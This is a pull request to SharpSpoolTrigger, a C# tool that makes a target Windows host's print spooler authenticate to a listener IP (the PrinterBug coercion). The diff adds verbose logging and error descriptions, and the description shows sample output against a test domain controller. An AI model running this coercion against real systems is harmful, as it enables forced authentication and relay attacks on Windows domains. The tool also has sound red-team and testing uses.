### PR TITLE
`SharpSpoolTrigger`: Add verbosity

### DIFF
--- a/SharpSpoolTrigger/Program.cs
+++ b/SharpSpoolTrigger/Program.cs
@@ -5,22 +5,18 @@ namespace SharpSpoolTrigger
 {
     internal class Program
     {
+
         private static void Main(string[] args)
         {
             if (args.Length < 2)
             {
-                Console.WriteLine("usage: SharpSpoolTrigger.exe <Target IP> <Listener IP>");
-                Console.WriteLine("usage: SharpSpoolTrigger.exe 192.168.1.10 192.168.1.250");
+                Console.WriteLine("Usage: SharpSpoolTrigger.exe <Target IP> <Listener IP>");
+                Console.WriteLine("Example: SharpSpoolTrigger.exe 192.168.1.10 192.168.1.250");
                 return;
             }
-            if (IntPtr.Size == 8)
-            {
-                Console.WriteLine("NdrClientCall2x64");
-            }
-            else
-            {
-                Console.WriteLine("CallNdrClientCall2x86");
-            }
+
+            Console.WriteLine($"[+] Running on {(IntPtr.Size == 8 ? "64-bit" : "32-bit")} architecture.");
+
 
             var Rprn = new rprn();
             IntPtr hHandle = IntPtr.Zero;
@@ -28,27 +24,50 @@ namespace SharpSpoolTrigger
 
             try
             {
+                Console.WriteLine("[*] Attempting to connect to printer on \\\\" + args[0]);
                 var ret = Rprn.RpcOpenPrinter("\\\\" + args[0], out hHandle, null, ref devmodeContainer, 0);
                 if (ret != 0)
                 {
-                    Console.WriteLine($"[-]RpcOpenPrinter status: {ret}");
+                    Console.WriteLine($"[-] RpcOpenPrinter failed with status: {ret} ({GetErrorDescription(ret)})");
                     return;
                 }
+                Console.WriteLine("[+] RpcOpenPrinter succeeded.");
+
+                Console.WriteLine("[*] Setting up remote printer change notification...");
                 ret = Rprn.RpcRemoteFindFirstPrinterChangeNotificationEx(hHandle, 0x00000100, 0, "\\\\" + args[1], 0);
                 if (ret != 0)
                 {
-                    Console.WriteLine($"[-]RpcRemoteFindFirstPrinterChangeNotificationEx status: {ret}");
+                    Console.WriteLine($"[-] RpcRemoteFindFirstPrinterChangeNotificationEx failed with status: {ret} ({GetErrorDescription(ret)})");
                     return;
                 }
             }
             catch (Exception ex)
             {
-                Console.WriteLine(ex);
+                Console.WriteLine($"Exception occurred: {ex.Message}");
             }
             finally
             {
                 if (hHandle != IntPtr.Zero)
+                {
                     Rprn.RpcClosePrinter(ref hHandle);
+                    Console.WriteLine("[+] Printer handle closed successfully.");
+                }
+            }
+        }
+
+
+        private static string GetErrorDescription(int errorCode)
+        {
+            switch (errorCode)
+            {
+                case 6:
+                    return "Invalid handle (ERROR_INVALID_HANDLE)";
+                case 5:
+                    return "Access denied (ERROR_ACCESS_DENIED)";
+                case 1722:
+                    return "The RPC server is unavailable (RPC_S_SERVER_UNAVAILABLE)";
+                default:
+                    return "Unknown error";
             }
         }
     }


### PR DESCRIPTION
Hi @cube0x0 👋

The modification serve to enhance usability, making the application more user-friendly and informative during operation.

Before, user received minimal guidance and cryptic error messages during execution:
```shell
NdrClientCall2x64
[-]RpcRemoteFindFirstPrinterChangeNotificationEx status: 6
```

Now:
```shell
[+] Running on 64-bit architecture.
[*] Attempting to connect to printer on \\dc01.test.com
[+] RpcOpenPrinter succeeded.
[*] Setting up remote printer change notification...
[-] RpcRemoteFindFirstPrinterChangeNotificationEx failed with status: 6 (Invalid handle (ERROR_INVALID_HANDLE))
[+] Printer handle closed successfully.
```

Not a lot but I thought It could help writeups and people.